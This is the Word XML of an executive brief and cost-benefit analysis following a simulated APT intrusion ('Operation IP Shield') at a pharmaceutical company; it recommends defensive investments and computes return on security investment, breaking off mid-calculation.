    <w:p w14:paraId="4E778799" w14:textId="77777777" w:rsidR="00AB7B99" w:rsidRDefault="00AB7B99" w:rsidP="00AB7B99">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A99D977" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="00EE4184">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc215571141"/>
      <w:r>
        <w:t>Executive Brief and Cost-Benefit Analysis (CBA)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="5B387EC0" w14:textId="77777777" w:rsidR="0044735A" w:rsidRPr="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Executive Brief: Strategic Risk and Investment Justification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21636165" w14:textId="6F0E451C" w:rsidR="002E59E8" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="0044735A">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve">"Operation IP Shield" ensured that an Advanced Persistent Threat (APT) system </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>could</w:t>
      </w:r>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> compromise </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t>Cureton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> Pharmaceutical Company's (CPC) hybrid infrastructure and</w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>full accuracy,</w:t>
      </w:r>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> critical research Intellectual Property (IP) without detection. The breach relied on simple human error (phishing) and the catastrophic vulnerability of plaintext credentials, enabling a pivot from the </w:t>
      </w:r>
      <w:r w:rsidR="007609F0">
        <w:t>on-premises</w:t>
      </w:r>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> network to the high-value AWS cloud. This threat is not the initial phishing attempt, but the speed and stealth of the lateral movement that went unchallenged by current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007609F0">
        <w:t>defence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> systems. The key finding is the lack of detection around legitimate tool abuse (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t>LOLBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t>) and critical Cloud Identity manipulation. This security gap exposes CPC to regulatory non-compliance (GDPR fines) and irreparable loss of competitive advantage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA6AA9" w14:textId="77777777" w:rsidR="003B18EB" w:rsidRDefault="003B18EB" w:rsidP="003B18EB">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9C2AC4" w14:textId="079B38B0" w:rsidR="0044735A" w:rsidRPr="003B18EB" w:rsidRDefault="0044735A" w:rsidP="003B18EB">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Recommended Strategic Investments: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45"/>
        <w:gridCol w:w="4950"/>
        <w:gridCol w:w="1255"/>
      </w:tblGrid>
      <w:tr w:rsidR="0044735A" w14:paraId="4085ACEE" w14:textId="77777777" w:rsidTr="00511F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E21A18F" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Investment Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B3FA445" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="138DC32F" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Estimated Annual Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0044735A" w14:paraId="50B59CF0" w14:textId="77777777" w:rsidTr="00511F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6347EB8B" w14:textId="236D0E48" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>1. Advanced EDR/HIDS (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007609F0">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Behavioural</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve"> Focus)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59241F77" w14:textId="000A7B4B" w:rsidR="0044735A" w:rsidRDefault="00852CAF">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>License</w:t>
            </w:r>
            <w:r w:rsidR="0044735A">
              <w:t xml:space="preserve"> renewal for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007609F0">
              <w:t>behavioural</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0044735A">
              <w:t xml:space="preserve"> analysis, UAC/LSASS access monitoring, and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0044735A">
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0044735A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0044735A">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">detection </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0044735A">
              <w:t>runbooks</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0044735A">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D80E9E" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>£150,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0044735A" w14:paraId="7A79DB05" w14:textId="77777777" w:rsidTr="00511F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62527F59" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2. Privileged Access Management (PAM) / Secrets Vault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11EC6335" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Implementation of a tool (e.g., </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>HashiCorp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Vault/AWS Secrets Manager) to eliminate all plaintext credential storage and enforce IAM Role assumption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A6B4FB" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>£75,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0044735A" w14:paraId="753C5C86" w14:textId="77777777" w:rsidTr="00511F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FD446DA" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>3. Cloud Security Posture Management (CSPM) &amp; DLP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAEF2BB" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Continuous monitoring of AWS for misconfigured IAM policies, public S3 buckets, and unusual API calls (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CloudTrail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>). Includes a dedicated DLP layer for external S3 transfers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA2F276" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>£50,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0044735A" w14:paraId="04889608" w14:textId="77777777" w:rsidTr="00511F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27B681B5" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>4. Zero Trust Micro-Segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F9ACE81" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Deployment of a software-defined perimeter solution to block internal RDP/SMB lateral movement between V-LANs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F0E4DC" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>£125,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0044735A" w14:paraId="40846C69" w14:textId="77777777" w:rsidTr="00511F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F056AD" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Total Annual Investment (</w:t>
            </w:r>
            <w:r w:rsidRPr="00B53CEB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b w:val="0"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4920" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D39CCF1" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D7805D4" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>£400,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="556E0A84" w14:textId="77777777" w:rsidR="00141FDA" w:rsidRDefault="00141FDA" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79965120" w14:textId="77777777" w:rsidR="0044735A" w:rsidRPr="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Cost-Benefit Analysis (CBA) – Justifying Investment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B33D67" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>The CBA calculates the potential Return on Security Investment (ROSI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754746CC" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="00511F46">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Single Loss Expectancy (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Estimated financial loss from a single IP breach (including R&amp;D loss, regulatory fines, and reputation damage). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>(Example: £15,000,000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73EAA8" w14:textId="274C2381" w:rsidR="0044735A" w:rsidRDefault="007609F0" w:rsidP="00511F46">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Annualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rate of Occurrence (</w:t>
      </w:r>
      <w:r w:rsidR="0044735A" w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ARO</w:t>
      </w:r>
      <w:r w:rsidR="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidR="0044735A">
        <w:t xml:space="preserve"> Estimated frequency of a successful APT breach without the new controls. </w:t>
      </w:r>
      <w:r w:rsidR="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>(Example: 15% or 0.15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFE1442" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="00511F46">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Annual Loss Expectancy (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ALE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ARO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>£2,250,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C1107" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="00511F46">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Mitigation Effectiveness (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Estimated reduction in ARO due to new controls (EDR/PAM/CSPM/ZTA). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>(Example: 80% or 0.80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10060659" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="00511F46">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Reduced ALE (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>RAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ALE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = £2,250,000 x (1 - 0.80) = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>£450,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E3EC6" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="00511F46">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Annual Savings (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Benefits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ALE</w:t>
      </w:r>
      <w:r>
